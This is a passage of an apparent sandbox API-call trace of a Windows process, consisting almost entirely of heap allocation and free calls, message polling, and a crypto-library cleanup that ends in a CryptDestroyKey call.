[0205.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0205.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ea8 [0205.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0205.040] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0205.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e28 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0205.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0205.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0205.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0205.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0205.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 16 [0205.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0205.041] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyKey", cchWideChar=16, lpMultiByteStr=0x2e50878, cbMultiByte=16, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyKey", lpUsedDefaultChar=0x0) returned 16 [0205.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0205.041] GetProcAddress (hModule=0x756e0000, lpProcName="CryptDestroyKey") returned 0x756ffa60 [0205.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0205.041] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e38 [0205.041] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.042] CryptDestroyKey (hKey=0xa87310) returned 1 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0205.042] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50710 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.042] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508d8 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0205.043] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ee8 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543f0 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509b0 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0205.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0205.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50740 | out: hHeap=0x970000) returned 1 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.044] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0205.044] CharUpperBuffW (in: lpsz="_CRYPT_SHUTDOWN", cchLength=0xf | out: lpsz="_CRYPT_SHUTDOWN") returned 0xf [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54468 | out: hHeap=0x970000) returned 1 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50890 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78858 [0205.044] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fc70 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0205.044] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTDEC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTDEC") returned 0x13 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fc70 | out: hHeap=0x970000) returned 1 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50728 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0205.044] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0205.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0205.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e507d0 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50968 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50788 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e506f8 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54508 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50830 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50938 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50878 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0205.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507e8 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507d0 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50968 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50788 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50938 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0205.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54508 | out: hHeap=0x970000) returned 1 [0205.045] PeekMessageW (in: lpMsg=0x8ceee0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceee0) returned 0 [0205.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50728 | out: hHeap=0x970000) returned 1 [0205.046] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ed8 [0205.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e801b0 [0205.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0205.046] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0205.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e801b0 | out: hHeap=0x970000) returned 1 [0205.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e88 | out: hHeap=0x970000) returned 1 [0205.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e508a8 [0205.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0205.046] PeekMessageW (in: lpMsg=0x8ced40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced40) returned 0 [0205.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0205.046] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0205.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0205.046] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d78 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a28 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a28 | out: hHeap=0x970000) returned 1 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d78 | out: hHeap=0x970000) returned 1 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77888 [0205.099] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77888 | out: hHeap=0x970000) returned 1 [0205.099] PeekMessageW (in: lpMsg=0x8cf140, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf140) returned 0 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50890 | out: hHeap=0x970000) returned 1 [0205.099] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0205.099] PeekMessageW (in: lpMsg=0x8cf3a0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3a0) returned 0 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e28 [0205.099] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e28 | out: hHeap=0x970000) returned 1 [0205.099] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0205.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e58 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e58 | out: hHeap=0x970000) returned 1 [0205.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0205.100] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ee8 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ee8 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50878 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508a8 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77688 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50950 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ea8 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543f0 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542d8 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54de8 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54148 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507b8 | out: hHeap=0x970000) returned 1 [0205.100] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50848 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e08 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54120 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e503f8 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50908 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50530 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50680 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50440 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50698 | out: hHeap=0x970000) returned 1 [0205.101] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: 